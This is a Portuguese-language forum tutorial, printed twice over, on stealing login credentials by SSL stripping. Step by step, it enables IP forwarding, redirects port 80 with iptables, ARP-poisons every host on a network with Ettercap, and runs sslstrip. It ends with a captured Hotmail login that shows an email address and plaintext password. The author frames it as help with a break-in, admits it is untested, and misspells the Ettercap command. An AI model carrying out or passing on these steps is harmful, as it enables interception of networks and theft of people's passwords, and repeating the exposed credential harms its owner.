Início
Bom recentemente tentando ajudar um amigo em uma invasão descobri uma coisa bem interessante e legal,
Já pensaram em interceptar o trafego de rede,
Lembrando não sei se esse procedimento pode ser funcional para interceptar ligações de outras redes que não seja a sua, ainda estou pesquisando isso.
Não tenho certeza que o que vou dizer aqui é totalemente funcional
Mas ao ver isso algo realmente me tocou e disse isso pode ser uma revolução
O SSLStrip criado em 2009 por Moxie Marlinspike foi uma nova façanha Black Hat.
A lógica do SSLstrip é bem simples, ele altera todos os GET's HTTPS por HTTP de uma página, e por meio de um ataque MITM, faz com que a Vítima e o Atacante se comuniquem via HTTP, quando na verdade o Atacante e o Servidor estão se comunicando via HTTPS.
Lembrando esse procedimento pode não funcionar corretamente,
Não tenho certeza da funcionalidade disso pois ainda não testei mas pode ajudar vocês.
De preferencia usem o Back Track 5 ou outro Sistema Operacional para Pentest.
Obs:O procedimento tem que ser feito com algum sistema operacional cujo kernel seja Linux.
O primeiro passo será liberar o repasse de pacotes na máquina do Atacante:
# sysctl -w net.ipv4.ip_forward=1
Onde:
-w : (write) escrever as mudanças no arquivo;
Agora iremos usar o IPtables para redirecionar todo tráfego TCP da porta 80, para TCP 4003 (porta no qual o SSLstrip irá escutar);
# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 4003
Onde:
-t : Tabela do Firewall;
-p : Protocolo;
--dport : Porta de destino;
-j : (jump) ou simplesmente alvo;
--to-port : Redirecionar para uma porta especifica.
O teste de fogo
O próximo passo será rodar o 'Ettercap' para interceptar o tráfego da rede:
# ettercarp -TqM ARP:REMOTE // //
Onde:
-T : (Text) Somente em modo texto;
-q : Modo Silencioso;
-M : (MITM) irá realizar um ataque do tipo Man In The Middle;
ARP : REMOTE: Realiza o envenenamento da tabela ARP das máquinas que estão conectadas na rede. Uma vez que o cache tenha sido envenenado as vítimas irão enviar todos os pacotes para o atacante que, por sua vez, pode modificar e encaminhá-los para o destino real.
// // : Realiza o ataque de envenenamento ARP contra todos os hosts na rede.
Para encerrar, basta abrir outro terminal, e executar o SSLstrip:
# cd /pentest/web/sslstrip
# ./sslstrip.py -a -l 4003
Onde:
-a: Registrar todo o tráfego HTTP e SSL para e do servidor;
-l: (listen) Ouvir em uma determinada porta especifica, o padrão é a porta 10000.
Basta uma nova sessão HTTPS (Gmail, Hotmail, Facebook, etc..) ser aberta, para conseguirmos visualizar de forma clara o usuário e senha do mesmo!
Abaixo um exemplo de conteúdo interceptado:
2011-12-20 12:49:19,605 SECURE POST Data (login.live.com):
login=gabriel.camargo%40hotmail.com&passwd=#Gabriel2011$&type=11&LoginOptions=3&NewUser=1&MEST=&PPSX=PassportRN&PPFT=
CSunM4mofYh
igqiObttRmtoFdxf8alO7UBN1O9Jb2EQYF1T5sE4qGl
teBPzjSYo1kd1jAsP7rlt80UdeEqjMeasL5WXvuVU%21n8NSpKRq3NxmBsw06rOBOfPnz4pejvv3qm0x7rcejM0zU0oCmtF9mL1UqTYa0VQELVDpW
Og3RhYACZh
XqKYJAbxteyPX%21Mr1Yrq*Un8yDSMnbAgENcljztLVOk
*y&idsbho=1&PwdPad=&sso=&i1=&i2=1&i3=19972&i4=&i12=1&i13=&i14=593&i15=1038
Usuário: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Password: #Gabriel2011$
Créditos: Fórum Viva o Linux
Edição do Tutorial: Ice Mike
Já pensaram em interceptar o trafego de rede,
Lembrando não sei se esse procedimento pode ser funcional para interceptar ligações de outras redes que não seja a sua, ainda estou pesquisando isso.
Não tenho certeza que o que vou dizer aqui é totalemente funcional
Mas ao ver isso algo realmente me tocou e disse isso pode ser uma revolução
O SSLStrip criado em 2009 por Moxie Marlinspike foi uma nova façanha Black Hat.
A lógica do SSLstrip é bem simples, ele altera todos os GET's HTTPS por HTTP de uma página, e por meio de um ataque MITM, faz com que a Vítima e o Atacante se comuniquem via HTTP, quando na verdade o Atacante e o Servidor estão se comunicando via HTTPS.
Lembrando esse procedimento pode não funcionar corretamente,
Não tenho certeza da funcionalidade disso pois ainda não testei mas pode ajudar vocês.
De preferencia usem o Back Track 5 ou outro Sistema Operacional para Pentest.
Obs:O procedimento tem que ser feito com algum sistema operacional cujo kernel seja Linux.
O primeiro passo será liberar o repasse de pacotes na máquina do Atacante:
# sysctl -w net.ipv4.ip_forward=1
Onde:
-w : (write) escrever as mudanças no arquivo;
Agora iremos usar o IPtables para redirecionar todo tráfego TCP da porta 80, para TCP 4003 (porta no qual o SSLstrip irá escutar);
# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 4003
Onde:
-t : Tabela do Firewall;
-p : Protocolo;
--dport : Porta de destino;
-j : (jump) ou simplesmente alvo;
--to-port : Redirecionar para uma porta especifica.
O teste de fogo
O próximo passo será rodar o 'Ettercap' para interceptar o tráfego da rede:
# ettercarp -TqM ARP:REMOTE // //
Onde:
-T : (Text) Somente em modo texto;
-q : Modo Silencioso;
-M : (MITM) irá realizar um ataque do tipo Man In The Middle;
ARP : REMOTE: Realiza o envenenamento da tabela ARP das máquinas que estão conectadas na rede. Uma vez que o cache tenha sido envenenado as vítimas irão enviar todos os pacotes para o atacante que, por sua vez, pode modificar e encaminhá-los para o destino real.
// // : Realiza o ataque de envenenamento ARP contra todos os hosts na rede.
Para encerrar, basta abrir outro terminal, e executar o SSLstrip:
# cd /pentest/web/sslstrip
# ./sslstrip.py -a -l 4003
Onde:
-a: Registrar todo o tráfego HTTP e SSL para e do servidor;
-l: (listen) Ouvir em uma determinada porta especifica, o padrão é a porta 10000.
Basta uma nova sessão HTTPS (Gmail, Hotmail, Facebook, etc..) ser aberta, para conseguirmos visualizar de forma clara o usuário e senha do mesmo!
Abaixo um exemplo de conteúdo interceptado:
2011-12-20 12:49:19,605 SECURE POST Data (login.live.com):
login=gabriel.camargo%40hotmail.com&passwd=#Gabriel2011$&type=11&LoginOptions=3&NewUser=1&MEST=&PPSX=PassportRN&PPFT=
CSunM4mofYh
igqiObttRmtoFdxf8alO7UBN1O9Jb2EQYF1T5sE4qGl
teBPzjSYo1kd1jAsP7rlt80UdeEqjMeasL5WXvuVU%21n8NSpKRq3NxmBsw06rOBOfPnz4pejvv3qm0x7rcejM0zU0oCmtF9mL1UqTYa0VQELVDpW
Og3RhYACZh
XqKYJAbxteyPX%21Mr1Yrq*Un8yDSMnbAgENcljztLVOk
*y&idsbho=1&PwdPad=&sso=&i1=&i2=1&i3=19972&i4=&i12=1&i13=&i14=593&i15=1038
Usuário: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Password: #Gabriel2011$
Créditos: Fórum Viva o Linux
Edição do Tutorial: Ice Mike